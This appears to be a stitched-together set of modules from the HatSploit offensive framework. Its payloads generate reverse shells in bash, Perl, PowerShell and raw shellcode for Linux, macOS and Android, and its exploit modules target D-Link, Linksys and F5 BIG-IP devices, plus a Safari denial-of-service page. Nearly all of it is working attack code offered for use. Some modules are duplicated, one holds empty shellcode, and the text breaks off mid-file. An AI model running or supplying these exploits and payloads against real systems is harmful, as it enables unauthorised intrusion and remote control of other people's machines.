class HatSploitPayload(Payload, HatVenom, TCPClient):
details = {
'Category': "stager",
'Name': "Linux armle Shell Reverse TCP",
'Payload': "linux/armle/shell_reverse_tcp",
'Authors': ['Ivan Nikolsky (enty8080)'],
'Description': "Shell reverse TCP payload for Linux armle.",
'Dependencies': [''],
'Comments': [''],
'Architecture': "armle",
'Platform': "linux",
'Risk': "high",
'Type': "reverse_tcp"
}
options = {
'LHOST': {
'Description': "Local host.",
'Value': TCPClient.get_local_host(),
'Type': "ip",
'Required': True
},
'LPORT': {
'Description': "Local port.",
'Value': 8888,
'Type': "port",
'Required': True
}
}
def run(self):
local_host, local_port = self.parse_options(self.options)
offsets = {'lhost': local_host, 'lport': local_port}
self.output_process("Generating shellcode...")
shellcode = (b"\x01\x10\x8F\xE2"
b"\x11\xFF\x2F\xE1"
b"\x02\x20\x01\x21"
b"\x92\x1A\x0F\x02"
b"\x19\x37\x01\xDF"
b"\x06\x1C\x08\xA1"
b"\x10\x22\x02\x37"
b"\x01\xDF\x3F\x27"
b"\x02\x21\x30\x1c"
b"\x01\xdf\x01\x39"
b"\xFB\xD5\x05\xA0"
b"\x92\x1a\x05\xb4"
b"\x69\x46\x0b\x27"
b"\x01\xDF\xC0\x46"
b"\x02\x00"
b":lport:port:"
b":lhost:ip:"
b"\x2f\x62\x69\x6e"
b"\x2f\x73\x68\x00")
self.output_process("Generating payload...")
payload = self.generate('elf', 'armle', shellcode, offsets)
return payload
class HatSploitModule(Module, Handler, TCPClient):
details = {
'Name': "Reverse TCP Stager",
'Module': "exploit/unix/stager/reverse_tcp",
'Authors': ['Ivan Nikolsky (enty8080)'],
'Description': "Reverse TCP Stager.",
'Dependencies': [''],
'Comments': [''],
'Platform': "unix",
'Risk': "high"
}
payload = {
'Description': "Payload to use.",
'Value': "unix/generic/bash_reverse_tcp",
'Categories': None,
'Architectures': None,
'Platforms': None,
'Types': None
}
options = {
'SRVHOST': {
'Description': "Local host to listen on.",
'Value': TCPClient.get_local_host(),
'Type': "ip",
'Required': True
},
'SRVPORT': {
'Description': "Local port to listen on.",
'Value': 8888,
'Type': "port",
'Required': True
},
'FOREVER': {
'Description': "Start listener forever.",
'Value': "no",
'Type': "boolean",
'Required': False
}
}
def run(self):
local_host, local_port, forever = self.parse_options(self.options)
if forever.lower() in ['yes', 'y']:
while True:
status = self.handle_session(host=local_host,
port=local_port,
payload=self.payload,
method="reverse_tcp")
if not status:
return
else:
self.handle_session(host=local_host,
port=local_port,
payload=self.payload,
method="reverse_tcp")
class HatSploitPayload(Payload, PayloadGenerator, TCPClient):
details = {
'Category': "stager",
'Name': "macOS x64 Shell Reverse TCP",
'Payload': "macos/x64/shell_reverse_tcp",
'Authors': ['Ivan Nikolsky (enty8080)'],
'Description': "Shell reverse TCP payload for macOS x64.",
'Dependencies': [''],
'Comments': [''],
'Architecture': "x64",
'Platform': "macos",
'Risk': "high",
'Type': "reverse_tcp"
}
options = {
'LHOST': {
'Description': "Local host.",
'Value': TCPClient.get_local_host(),
'Type': "ip",
'Required': True
},
'LPORT': {
'Description': "Local port.",
'Value': 8888,
'Type': "port",
'Required': True
},
'FORMAT': {
'Description': "Executable format.",
'Value': "macho",
'Type': None,
'Required': True
}
}
def run(self):
local_host, local_port, executable_format = self.parse_options(
self.options)
local_host = self.host_to_bytes(local_host)
local_port = self.port_to_bytes(local_port)
if executable_format not in self.formats.keys():
self.output_error("Invalid executable format!")
return
self.output_process("Generating shellcode...")
shellcode = (b"")
self.output_process("Generating payload...")
payload = self.generate(executable_format, 'x64', shellcode)
return payload
class HatSploitPayload(Payload, TCPClient):
config = Config()
details = {
'Category': "stager",
'Name': "macOS aarch64 Membrane Reverse TCP",
'Payload': "macos/aarch64/membrane_reverse_tcp",
'Authors': ['Ivan Nikolsky (enty8080)'],
'Description': "Membrane reverse TCP payload for macOS aarch64.",
'Dependencies': [''],
'Comments': [''],
'Architecture': "aarch64",
'Platform': "macos",
'Risk': "high",
'Type': "reverse_tcp"
}
options = {
'LHOST': {
'Description': "Local host.",
'Value': TCPClient.get_local_host(),
'Type': "ip",
'Required': True
},
'LPORT': {
'Description': "Local port.",
'Value': 8888,
'Type': "port",
'Required': True
}
}
def run(self):
local_host, local_port = self.parse_options(self.options)
remote_data = base64.b64encode(
(local_host + ':' + local_port).encode())
remote_data = remote_data.decode()
self.output_process("Generating payload...")
try:
binary = open(
self.config.path_config['base_paths']['data_path'] +
'payloads/macos/aarch64/membrane_reverse_tcp/bin/membrane.bin',
'rb')
payload = binary.read()
binary.close()
except Exception:
self.output_error("Failed to generate payload!")
return
return payload, remote_data, HatSploitSession
class HatSploitPayload(Payload, StringTools, TCPClient):
details = {
'Category': "stager",
'Name': "macOS x64 Membrane Reverse TCP",
'Payload': "macos/x64/membrane_reverse_tcp",
'Authors': [
'Ivan Nikolsky (enty8080)'
],
'Description': "Membrane reverse TCP payload for macOS x64.",
'Dependencies': [
''
],
'Comments': [
''
],
'Architecture': "x64",
'Platform': "macos",
'Risk': "high",
'Type': "reverse_tcp"
}
options = {
'LHOST': {
'Description': "Local host.",
'Value': TCPClient.get_local_host(),
'Type': "ip",
'Required': True
},
'LPORT': {
'Description': "Local port.",
'Value': 8888,
'Type': "port",
'Required': True
}
}
def run(self):
local_host, local_port = self.parse_options(self.options)
local_host = self.xor_string(local_host)
local_port = self.xor_string(local_port)
self.output_process("Generating payload...")
with open('data/membrane/macos/x64/membrane', 'rb') as f:
payload = f.read()
return payload, f"reverse '{local_host}' '{local_port}'", HatSploitSession
class HatSploitPayload(Payload, HatVenom, TCPClient):
details = {
'Category': "stager",
'Name': "macOS x64 Shell Reverse TCP",
'Payload': "macos/x64/shell_reverse_tcp",
'Authors': ['Ivan Nikolsky (enty8080)'],
'Description': "Shell reverse TCP payload for macOS x64.",
'Dependencies': [''],
'Comments': [''],
'Architecture': "x64",
'Platform': "macos",
'Risk': "high",
'Type': "reverse_tcp"
}
options = {
'LHOST': {
'Description': "Local host.",
'Value': TCPClient.get_local_host(),
'Type': "ip",
'Required': True
},
'LPORT': {
'Description': "Local port.",
'Value': 8888,
'Type': "port",
'Required': True
}
}
def run(self):
local_host, local_port = self.parse_options(self.options)
offsets = {'lhost': local_host, 'lport': local_port}
self.output_process("Generating shellcode...")
shellcode = (b":lhost:ip:" b":lport:port:")
self.output_process("Generating payload...")
payload = self.generate('macho', 'x64', shellcode, offsets)
return payload
class HatSploitPayload(Payload, TCPClient):
details = {
'Category': "single",
'Name': "Perl Shell Reverse TCP",
'Payload': "unix/generic/perl_reverse_tcp",
'Authors': ['Ivan Nikolsky (enty8080)'],
'Description': "Perl shell reverse TCP payload.",
'Dependencies': [''],
'Comments': [''],
'Architecture': "generic",
'Platform': "unix",
'Risk': "high",
'Type': "reverse_tcp"
}
options = {
'LHOST': {
'Description': "Local host.",
'Value': TCPClient.get_local_host(),
'Type': "ip",
'Required': True
},
'LPORT': {
'Description': "Local port.",
'Value': 8888,
'Type': "port",
'Required': True
}
}
def run(self):
local_host, local_port = self.parse_options(self.options)
local_data = local_host + ':' + local_port
self.output_process("Generating payload...")
payload = "perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,\"LOCAL_DATA\");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'"
payload = payload.replace("LOCAL_DATA", local_data)
return payload
class HatSploitPayload(Payload, TCPClient):
details = {
'Category': "single",
'Name': "Bash Shell Reverse TCP",
'Payload': "unix/generic/bash_reverse_tcp",
'Authors': ['Ivan Nikolsky (enty8080)'],
'Description': "Bash shell reverse TCP payload.",
'Dependencies': [''],
'Comments': [''],
'Architecture': "generic",
'Platform': "unix",
'Risk': "high",
'Type': "reverse_tcp"
}
options = {
'LHOST': {
'Description': "Local host.",
'Value': TCPClient.get_local_host(),
'Type': "ip",
'Required': True
},
'LPORT': {
'Description': "Local port.",
'Value': 8888,
'Type': "port",
'Required': True
}
}
def run(self):
local_host, local_port = self.parse_options(self.options)
self.output_process("Generating payload...")
payload = f"/bin/sh &>/dev/tcp/{local_host}/{local_port} 0>&1 &"
return payload
class HatSploitModule(Module, Handler, StringTools, HTTPClient, TCPClient):
details = {
'Name': "D-Link hedwig Remote Code Execution",
'Module': "exploit/unix/dlink/hedwig_code_execution",
'Authors': ['Ivan Nikolsky (enty8080)', 'Roberto Paleari'],
'Description':
"Remote Code Execution in D-Link DIR-645 <= 1.03, DIR-300 <= 2.14, DIR-600.",
'Dependencies': [''],
'Comments': [''],
'Platform': "unix",
'Risk': "high"
}
payload = {
'Description': "Payload to use.",
'Value': "linux/mipsle/shell_reverse_tcp",
'Categories': None,
'Architectures': ['mipsle', 'mipsbe', 'generic'],
'Platforms': None,
'Types': None
}
options = {
'RHOST': {
'Description': "Remote host.",
'Value': None,
'Type': "ip",
'Required': True
},
'RPORT': {
'Description': "Remote port.",
'Value': 80,
'Type': "port",
'Required': True
},
'SRVHOST': {
'Description': "Local host to listen on.",
'Value': TCPClient.get_local_host(),
'Type': "ip",
'Required': True
},
'SRVPORT': {
'Description': "Local port to listen on.",
'Value': 8888,
'Type': "port",
'Required': True
}
}
def execute_command(self, remote_host, remote_port, command):
command = command.encode("utf-8")
libcbase = 0x2aaf8000
system = 0x000531FF
calcsystem = 0x000158C8
callsystem = 0x000159CC
shellcode = self.random_string(973).encode("utf-8")
shellcode += struct.pack("<I", libcbase + system)
shellcode += self.random_string(16).encode("utf-8")
shellcode += struct.pack("<I", libcbase + callsystem)
shellcode += self.random_string(12).encode("utf-8")
shellcode += struct.pack("<I", libcbase + calcsystem)
shellcode += self.random_string(16).encode("utf-8")
shellcode += command
headers = {
"Content-Type": "application/x-www-form-urlencoded",
"Cookie": b"uid=" + shellcode + b";"
}
data = {self.random_string(7): self.random_string(7)}
self.http_request(method="POST",
host=remote_host,
port=remote_port,
path='/hedwig.cgi',
data=data,
headers=headers)
def check_vulnerable(self, remote_host, remote_port):
response = self.http_request(method="GET",
host=remote_host,
port=remote_port,
path="/hedwig.cgi")
if response is None or response.status_code != 200:
return False
def run(self):
remote_host, remote_port, local_host, local_port = self.parse_options(
self.options)
self.output_process(f"Exploiting {remote_host}...")
if not self.check_vulnerable(remote_host, remote_port):
self.output_error("Exploit failed!")
return
self.handle_session(host=local_host,
port=local_port,
payload=self.payload,
sender=self.execute_command,
args=[remote_host, remote_port],
timeout=10)
class HatSploitModule(Module, HTTPClient, TCPClient):
details = {
'Name': "iPhoneOS Safari WebKit Filter DoS",
'Module': "exploit/iphoneos/safari/webkit_filter_dos",
'Authors': ['Ivan Nikolsky (enty8080)', 'Sabri Haddouche (pwnsdx)'],
'Description':
"iPhoneOS 9.1 till 12.1 MobileSafari.app WebKit Filter DoS.",
'Dependencies': [''],
'Comments': [''],
'Platform': "iphoneos",
'Risk': "high"
}
options = {
'LHOST': {
'Description': "Local host.",
'Value': TCPClient.get_local_host(),
'Type': "ip",
'Required': True
},
'LPORT': {
'Description': "Local port.",
'Value': 80,
'Type': "port",
'Required': True
},
'FOREVER': {
'Description': "Start http server forever.",
'Value': "no",
'Type': "boolean",
'Required': False
}
}
@staticmethod
def generate():
div_line = '<div>' * 3500 + '</div>' * 3500
payload = """
<html>
<head>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type"/>
<style>
div {
backdrop-filter: blur(10px);
-webkit-backdrop-filter: blur(10px);
width:10000px; height:10000px;
}
</style>
</head>
<body>
""" + div_line + """
</body>
</html>
"""
return payload
def run(self):
local_host, local_port, forever = self.parse_options(self.options)
self.output_process(f"Performing DoS attack on {remote_host}...")
payload = self.generate()
self.start_server(local_host, local_port, payload,
True if forever in ['yes', 'y'] else False)
self.output_success("DoS attack successfully completed!")
class HatSploitPayload(Payload, HatVenom, TCPClient):
details = {
'Category': "stager",
'Name': "Linux x64 Shell Reverse TCP",
'Payload': "linux/x64/shell_reverse_tcp",
'Authors': ['Ivan Nikolsky (enty8080)'],
'Description': "Shell reverse TCP payload for Linux x64.",
'Dependencies': [''],
'Comments': [''],
'Architecture': "x64",
'Platform': "linux",
'Risk': "high",
'Type': "reverse_tcp"
}
options = {
'LHOST': {
'Description': "Local host.",
'Value': TCPClient.get_local_host(),
'Type': "ip",
'Required': True
},
'LPORT': {
'Description': "Local port.",
'Value': 8888,
'Type': "port",
'Required': True
}
}
def run(self):
local_host, local_port = self.parse_options(self.options)
offsets = {'lhost': local_host, 'lport': local_port}
self.output_process("Generating shellcode...")
shellcode = (
b"\x6a\x29" # pushq $0x29
b"\x58" # pop %rax
b"\x99" # cltd
b"\x6a\x02" # pushq $0x2
b"\x5f" # pop %rdi
b"\x6a\x01" # pushq $0x1
b"\x5e" # pop %rsi
b"\x0f\x05" # syscall
b"\x48\x97" # xchg %rax,%rdi
b"\x48\xb9\x02\x00" # movabs $0x100007fb3150002,%rcx
b":lport:port:" # port
b":lhost:ip:" # ip
b"\x51" # push %rcx
b"\x48\x89\xe6" # mov %rsp,%rsi
b"\x6a\x10" # pushq $0x10
b"\x5a" # pop %rdx
b"\x6a\x2a" # pushq $0x2a
b"\x58" # pop %rax
b"\x0f\x05" # syscall
b"\x6a\x03" # pushq $0x3
b"\x5e" # pop %rsi
b"\x48\xff\xce" # dec %rsi
b"\x6a\x21" # pushq $0x21
b"\x58" # pop %rax
b"\x0f\x05" # syscall
b"\x75\xf6" # jne 27 <dup2_loop>
b"\x6a\x3b" # pushq $0x3b
b"\x58" # pop %rax
b"\x99" # cltd
b"\x48\xbb\x2f\x62\x69\x6e\x2f" # movabs $0x68732f6e69622f,%rbx
b"\x73\x68\x00" # [redacted]
b"\x53" # push %rbx
b"\x48\x89\xe7" # mov %rsp,%rdi
b"\x52" # push %rdx
b"\x57" # push %rdi
b"\x48\x89\xe6" # mov %rsp,%rsi
b"\x0f\x05" # syscall
)
self.output_process("Generating payload...")
payload = self.generate('elf', 'x64', shellcode, offsets)
return payload
class HatSploitPayload(Payload, HatVenom, TCPClient):
details = {
'Category': "stager",
'Name': "macOS x64 Shell Reverse TCP",
'Payload': "macos/x64/shell_reverse_tcp",
'Authors': ['Ivan Nikolsky (enty8080)'],
'Description': "Shell reverse TCP payload for macOS x64.",
'Dependencies': [''],
'Comments': [''],
'Architecture': "x64",
'Platform': "macos",
'Risk': "high",
'Type': "reverse_tcp"
}
options = {
'LHOST': {
'Description': "Local host.",
'Value': TCPClient.get_local_host(),
'Type': "ip",
'Required': True
},
'LPORT': {
'Description': "Local port.",
'Value': 8888,
'Type': "port",
'Required': True
}
}
def run(self):
local_host, local_port = self.parse_options(self.options)
offsets = {'lhost': local_host, 'lport': local_port}
self.output_process("Generating shellcode...")
shellcode = (
b"\x41\xb0\x02" # movb $2, %r8b
b"\x49\xc1\xe0\x18" # shlq $24, %r8
b"\x49\x83\xc8\x61" # orq $97, %r8
b"\x4c\x89\xc0" # movq %r8, %rax
b"\x48\x31\xd2" # xorq %rdx, %rdx
b"\x48\x89\xd6" # movq %rdx, %rsi
b"\x48\xff\xc6" # incq %rsi
b"\x48\x89\xf7" # movq %rsi, %rdi
b"\x48\xff\xc7" # incq %rdi
b"\x0f\x05" # syscall
b"\x49\x89\xc4" # movq %rax, %r12
b"\x49\xbd\x01\x01" # movabsq $-2750349055, %r13
b":lport:port:" # port
b":lhost:ip:" # host
b"\x41\xb1\xff" # movb $-1, %r9b
b"\x4d\x29\xcd" # subq %r9, %r13
b"\x41\x55" # pushq %r13
b"\x49\x89\xe5" # movq %rsp, %r13
b"\x49\xff\xc0" # incq %r8
b"\x4c\x89\xc0" # movq %r8, %rax
b"\x4c\x89\xe7" # movq %r12, %rdi
b"\x4c\x89\xee" # movq %r13, %rsi
b"\x48\x83\xc2\x10" # addq $16, %rdx
b"\x0f\x05" # syscall
b"\x49\x83\xe8\x08" # subq $8, %r8
b"\x48\x31\xf6" # xorq %rsi, %rsi
b"\x4c\x89\xc0" # movq %r8, %rax
b"\x4c\x89\xe7" # movq %r12, %rdi
b"\x0f\x05" # syscall
b"\x48\x83\xfe\x02" # cmpq $2, %rsi
b"\x48\xff\xc6" # incq %rsi
b"\x76\xef" # jbe -17 <dup>
b"\x49\x83\xe8\x1f" # subq $31, %r8
b"\x4c\x89\xc0" # movq %r8, %rax
b"\x48\x31\xd2" # xorq %rdx, %rdx
b"\x49\xbd\xff\x2f\x62\x69\x6e\x2f\x73\x68" # movabsq $7526411553527181311, %r13
b"\x49\xc1\xed\x08" # shrq $8, %r13
b"\x41\x55" # pushq %r13
b"\x48\x89\xe7" # movq %rsp, %rdi
b"\x48\x31\xf6" # xorq %rsi, %rsi
b"\x0f\x05" # syscall
)
self.output_process("Generating payload...")
payload = self.generate('macho', 'x64', shellcode, offsets)
return payload
class HatSploitModule(Module, Handler, HTTPClient, TCPClient):
details = {
'Name': "F5 Big-IP TMUI Remote Code Execution",
'Module': "exploit/unix/f5/big_ip_tmui_rce",
'Authors': ['Ivan Nikolsky (enty8080)', 'Mikhail Klyuchnikov'],
'Description':
"Remote Code Execution in F5 BIG-IP Traffic Management User Interface (TMUI).",
'Dependencies': [''],
'Comments': [''],
'Platform': "unix",
'Risk': "high"
}
payload = {
'Description': "Payload to use.",
'Value': "unix/generic/netcat_reverse_tcp",
'Categories': ['single'],
'Architectures': None,
'Platforms': None,
'Types': ['reverse_tcp']
}
options = {
'RHOST': {
'Description': "Remote host.",
'Value': None,
'Type': "ip",
'Required': True
},
'RPORT': {
'Description': "Remote port.",
'Value': None,
'Type': "port",
'Required': True
},
'SRVHOST': {
'Description': "Local host to listen on.",
'Value': TCPClient.get_local_host(),
'Type': "ip",
'Required': True
},
'SRVPORT': {
'Description': "Local port to listen on.",
'Value': 8888,
'Type': "port",
'Required': True
}
}
def execute_command(self, remote_host, remote_port, command):
path = f"/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command={command}"
self.http_request(method="GET",
host=remote_host,
port=remote_port,
path=path)
def run(self):
remote_host, remote_port, local_host, local_port = self.parse_options(
self.options)
self.output_process(f"Exploiting {remote_host}...")
self.handle_session(host=local_host,
port=local_port,
payload=self.payload,
sender=self.execute_command,
args=[remote_host, remote_port],
timeout=10)
class HatSploitPayload(Payload, HatVenom, TCPClient):
details = {
'Category': "stager",
'Name': "Linux x86 Shell Reverse TCP",
'Payload': "linux/x86/shell_reverse_tcp",
'Authors': [
'Ivan Nikolsky (enty8080)'
],
'Description': "Shell reverse TCP payload for Linux x86.",
'Dependencies': [
''
],
'Comments': [
''
],
'Architecture': "x86",
'Platform': "linux",
'Risk': "high",
'Type': "reverse_tcp"
}
options = {
'LHOST': {
'Description': "Local host.",
'Value': TCPClient.get_local_host(),
'Type': "ip",
'Required': True
},
'LPORT': {
'Description': "Local port.",
'Value': 8888,
'Type': "port",
'Required': True
}
}
def run(self):
local_host, local_port = self.parse_options(self.options)
offsets = {
'lhost': local_host,
'lport': local_port
}
self.output_process("Generating shellcode...")
shellcode = (
b"\x31\xdb" # xor ebx,ebx
b"\xf7\xe3" # mul ebx
b"\x53" # push ebx
b"\x43" # inc ebx
b"\x53" # push ebx
b"\x6a\x02" # push byte +0x2
b"\x89\xe1" # mov ecx,esp
b"\xb0\x66" # mov al,0x66 (sys_socketcall)
b"\xcd\x80" # int 0x80
b"\x93" # xchg eax,ebx
b"\x59" # pop ecx
b"\xb0\x3f" # mov al,0x3f (sys_dup2)
b"\xcd\x80" # int 0x80
b"\x49" # dec ecx
b"\x79\xf9" # jns 0x11
b"\x68:lhost:ip:" # push ip addr
b"\x68\x02\x00" # push port
b":lport:port:"
b"\x89\xe1" # mov ecx,esp
b"\xb0\x66" # mov al,0x66 (sys_socketcall)
b"\x50" # push eax
b"\x51" # push ecx
b"\x53" # push ebx
b"\xb3\x03" # mov bl,0x3
b"\x89\xe1" # mov ecx,esp
b"\xcd\x80" # int 0x80
b"\x52" # push edx
b"\x68\x6e\x2f\x73\x68" # push n/sh
b"\x68\x2f\x2f\x62\x69" # push //bi
b"\x89\xe3" # mov ebx,esp
b"\x52" # push edx
b"\x53" # push ebx
b"\x89\xe1" # mov ecx,esp
b"\xb0\x0b" # mov al,0xb (execve)
b"\xcd\x80" # int 0x80
)
self.output_process("Generating payload...")
payload = self.generate('elf', 'x86', shellcode, offsets)
return payload
class HatSploitPayload(Payload, PayloadGenerator, TCPClient):
details = {
'Category': "stager",
'Name': "Linux x86 Shell Reverse TCP",
'Payload': "linux/x86/shell_reverse_tcp",
'Authors': ['Ivan Nikolsky (enty8080)'],
'Description': "Shell reverse TCP payload for Linux x86.",
'Dependencies': [''],
'Comments': [''],
'Architecture': "x86",
'Platform': "linux",
'Risk': "high",
'Type': "reverse_tcp"
}
options = {
'LHOST': {
'Description': "Local host.",
'Value': TCPClient.get_local_host(),
'Type': "ip",
'Required': True
},
'LPORT': {
'Description': "Local port.",
'Value': 8888,
'Type': "port",
'Required': True
},
'FORMAT': {
'Description': "Executable format.",
'Value': "elf",
'Type': None,
'Required': True
}
}
def run(self):
local_host, local_port, executable_format = self.parse_options(
self.options)
local_host = self.host_to_bytes(local_host)
local_port = self.port_to_bytes(local_port)
if executable_format not in self.formats.keys():
self.output_error("Invalid executable format!")
return
self.output_process("Generating shellcode...")
shellcode = (
b"\x31\xdb" # xor ebx,ebx
b"\xf7\xe3" # mul ebx
b"\x53" # push ebx
b"\x43" # inc ebx
b"\x53" # push ebx
b"\x6a\x02" # push byte +0x2
b"\x89\xe1" # mov ecx,esp
b"\xb0\x66" # mov al,0x66 (sys_socketcall)
b"\xcd\x80" # int 0x80
b"\x93" # xchg eax,ebx
b"\x59" # pop ecx
b"\xb0\x3f" # mov al,0x3f (sys_dup2)
b"\xcd\x80" # int 0x80
b"\x49" # dec ecx
b"\x79\xf9" # jns 0x11
b"\x68" + local_host + # push ip addr
b"\x68\x02\x00" + local_port + # push port
b"\x89\xe1" # mov ecx,esp
b"\xb0\x66" # mov al,0x66 (sys_socketcall)
b"\x50" # push eax
b"\x51" # push ecx
b"\x53" # push ebx
b"\xb3\x03" # mov bl,0x3
b"\x89\xe1" # mov ecx,esp
b"\xcd\x80" # int 0x80
b"\x52" # push edx
b"\x68\x6e\x2f\x73\x68" # push n/sh
b"\x68\x2f\x2f\x62\x69" # push //bi
b"\x89\xe3" # mov ebx,esp
b"\x52" # push edx
b"\x53" # push ebx
b"\x89\xe1" # mov ecx,esp
b"\xb0\x0b" # mov al,0xb (execve)
b"\xcd\x80" # int 0x80
)
self.output_process("Generating payload...")
payload = self.generate(executable_format, 'x86', shellcode)
return payload
class HatSploitPayload(Payload, TCPClient):
details = {
'Category': "single",
'Name': "Powershell Reverse TCP",
'Payload': "unix/generic/powershell_reverse_tcp",
'Authors': [
'Ivan Nikolsky (enty8080)'
],
'Description': "Powershell reverse TCP payload.",
'Dependencies': [
''
],
'Comments': [
''
],
'Architecture': "generic",
'Platform': "windows",
'Risk': "high",
'Type': "reverse_tcp"
}
options = {
'LHOST': {
'Description': "Local host.",
'Value': TCPClient.get_local_host(),
'Type': "ip",
'Required': True
},
'LPORT': {
'Description': "Local port.",
'Value': 8888,
'Type': "port",
'Required': True
}
}
def run(self):
local_host, local_port = self.parse_options(self.options)
self.output_process("Generating payload...")
source = (
f"$a='{local_host}';"
f"$b={local_port};"
"$c=New-Object system.net.sockets.tcpclient;"
"$nb=New-Object System.Byte[] $c.ReceiveBufferSize;"
"$ob=New-Object System.Byte[] 65536;"
"$eb=New-Object System.Byte[] 65536;"
"$e=new-object System.Text.UTF8Encoding;"
"$p=New-Object System.Diagnostics.Process;"
"$p.StartInfo.FileName='cmd.exe';"
"$p.StartInfo.RedirectStandardInput=1;"
"$p.StartInfo.RedirectStandardOutput=1;"
"$p.StartInfo.RedirectStandardError=1;"
"$p.StartInfo.UseShellExecute=0;"
"$q=$p.Start();"
"$is=$p.StandardInput;"
"$os=$p.StandardOutput;"
"$es=$p.StandardError;"
"$osread=$os.BaseStream.BeginRead($ob, 0, $ob.Length, $null, $null);"
"$esread=$es.BaseStream.BeginRead($eb, 0, $eb.Length, $null, $null);"
"$c.connect($a,$b);"
"$s=$c.GetStream();"
"while ($true) {"
"start-sleep -m 100;"
"if ($osread.IsCompleted -and $osread.Result -ne 0) {"
"$r=$os.BaseStream.EndRead($osread);"
"$s.Write($ob,0,$r);"
"$s.Flush();"
"$osread=$os.BaseStream.BeginRead($ob, 0, $ob.Length, $null, $null);"
"}"
"if ($esread.IsCompleted -and $esread.Result -ne 0) {"
"$r=$es.BaseStream.EndRead($esread);"
"$s.Write($eb,0,$r);"
"$s.Flush();"
"$esread=$es.BaseStream.BeginRead($eb, 0, $eb.Length, $null, $null);"
"}"
"if ($s.DataAvailable) {"
"$r=$s.Read($nb,0,$nb.Length);"
"if ($r -lt 1) {"
"break;"
"} else {"
"$str=$e.GetString($nb,0,$r);"
"$is.write($str);"
"}"
"}"
"if ($c.Connected -ne $true -or ($c.Client.Poll(1,[System.Net.Sockets.SelectMode]::SelectRead) -and $c.Client.Available -eq 0)) {"
"break;"
"}"
"if ($p.ExitCode -ne $null) {"
"break;"
"}"
"}"
)
payload = f"powershell -w hidden -nop -c {source}"
return payload
class HatSploitModule(Module, Handler, HTTPClient, TCPClient):
details = {
'Name': "F5 Big-IP iControl Remote Code Execution",
'Module': "exploit/unix/f5/big_ip_icontrol_rce",
'Authors': [
'Ivan Nikolsky (enty8080)',
'Al1ex (Al1ex)'
],
'Description': "Remote Code Execution in F5 BIG-IP iControl REST.",
'Dependencies': [
''
],
'Comments': [
''
],
'Platform': "unix",
'Risk': "high"
}
payload = {
'Description': "Payload to use.",
'Value': "unix/generic/bash_reverse_tcp",
'Categories': [
'single'
],
'Architectures': None,
'Platforms': None,
'Types': [
'reverse_tcp'
]
}
options = {
'RHOST': {
'Description': "Remote host.",
'Value': None,
'Type': "ip",
'Required': True
},
'RPORT': {
'Description': "Remote port.",
'Value': None,
'Type': "port",
'Required': True
},
'SRVHOST': {
'Description': "Local host to listen on.",
'Value': TCPClient.get_local_host(),
'Type': "ip",
'Required': True
},
'SRVPORT': {
'Description': "Local port to listen on.",
'Value': 8888,
'Type': "port",
'Required': True
}
}
def execute_command(self, remote_host, remote_port, command):
headers = {
"User-Agent": "None",
"Content-Type": "application/json",
"X-F5-Auth-Token": "",
"Authorization": "Basic YWRtaW46QVNhc1M="
}
shell_trap = '/mgmt/tm/util/bash'
payload = {"command": "run", "utilCmdArgs": f"-c '{command}'"}
self.http_request(
method="POST",
host=remote_host,
port=remote_port,
headers=headers,
path=shell_trap,
json=payload
)
def run(self):
remote_host, remote_port, local_host, local_port = self.parse_options(self.options)
self.output_process(f"Exploiting {remote_host}...")
self.handle_session(
host=local_host,
port=local_port,
payload=self.payload,
sender=self.execute_command,
args=[remote_host, remote_port],
timeout=10
)
class HatSploitModule(Module, Handler, HTTPClient, TCPClient):
details = {
'Name': "Linksys E-Series tmUnblock Remote Code Execution",
'Module': "exploit/unix/linksys/eseries_tmunblock_rce",
'Authors': ['Ivan Nikolsky (enty8080)', 'Johannes Ullrich (jullrich)'],
'Description': "Remote Code Execution in Linksys E-Series.",
'Dependencies': [''],
'Comments': [''],
'Platform': "unix",
'Risk': "high"
}
payload = {
'Description': "Payload to use.",
'Value': "linux/mipsle/shell_reverse_tcp",
'Categories': None,
'Architectures': ['mipsle', 'mipsbe', 'generic'],
'Platforms': None,
'Types': None
}
options = {
'RHOST': {
'Description': "Remote host.",
'Value': None,
'Type': "ip",
'Required': True
},
'RPORT': {
'Description': "Remote port.",
'Value': 80,
'Type': "port",
'Required': True
},
'SRVHOST': {
'Description': "Local host to listen on.",
'Value': TCPClient.get_local_host(),
'Type': "ip",
'Required': True
},
'SRVPORT': {
'Description': "Local port to listen on.",
'Value': 8888,
'Type': "port",
'Required': True
}
}
def execute_command(self, remote_host, remote_port, command):
payload = {
"submit_button": "",
"change_action": "",
"action": "",
"commit": "0",
"ttcp_num": "2",
"ttcp_size": "2",
"ttcp_ip": f"-h `{command}`",
"StartEPI": "1"
}
self.http_request(method="POST",
host=remote_host,
port=remote_port,
data=payload)
def check_vulnerable(self, remote_host, remote_port):
response = self.http_request(method="GET",
host=remote_host,
port=remote_port,
path="/tmUnblock.cgi")
if response is None or response.status_code != 200:
return False
def run(self):
remote_host, remote_port, local_host, local_port = self.parse_options(
self.options)
self.output_process(f"Exploiting {remote_host}...")
if not self.check_vulnerable(remote_host, remote_port):
self.output_error("Exploit failed!")
return
self.handle_session(host=local_host,
port=local_port,
payload=self.payload,
sender=self.execute_command,
args=[remote_host, remote_port],
timeout=10)
class HatSploitPayload(Payload, PayloadGenerator, TCPClient):
details = {
'Category': "stager",
'Name': "Android armle Shell Reverse TCP",
'Payload': "android/armle/shell_reverse_tcp",
'Authors': [
'Ivan Nikolsky (enty8080)'
],
'Description': "Shell reverse TCP payload for Android armle.",
'Dependencies': [
''
],
'Comments': [
''
],
'Architecture': "armle",
'Platform': "android",
'Risk': "high",
'Type': "reverse_tcp"
}
options = {
'LHOST': {
'Description': "Local host.",
'Value': TCPClient.get_local_host(),
'Type': "ip",
'Required': True
},
'LPORT': {
'Description': "Local port.",
'Value': 8888,
'Type': "port",
'Required': True
},
'FORMAT': {
'Description': "Executable format.",
'Value': "elf",
'Type': None,
'Required': True
}
}
def run(self):
local_host, local_port, executable_format = self.parse_options(self.options)
local_host = self.host_to_bytes(local_host)
local_port = self.port_to_bytes(local_port)
if executable_format not in self.formats.keys():
self.output_error("Invalid executable format!")
return
self.output_process("Generating shellcode...")
shellcode = (
b"\x01\x10\x8F\xE2"
b"\x11\xFF\x2F\xE1"
b"\x02\x20\x01\x21"
b"\x92\x1A\x0F\x02"
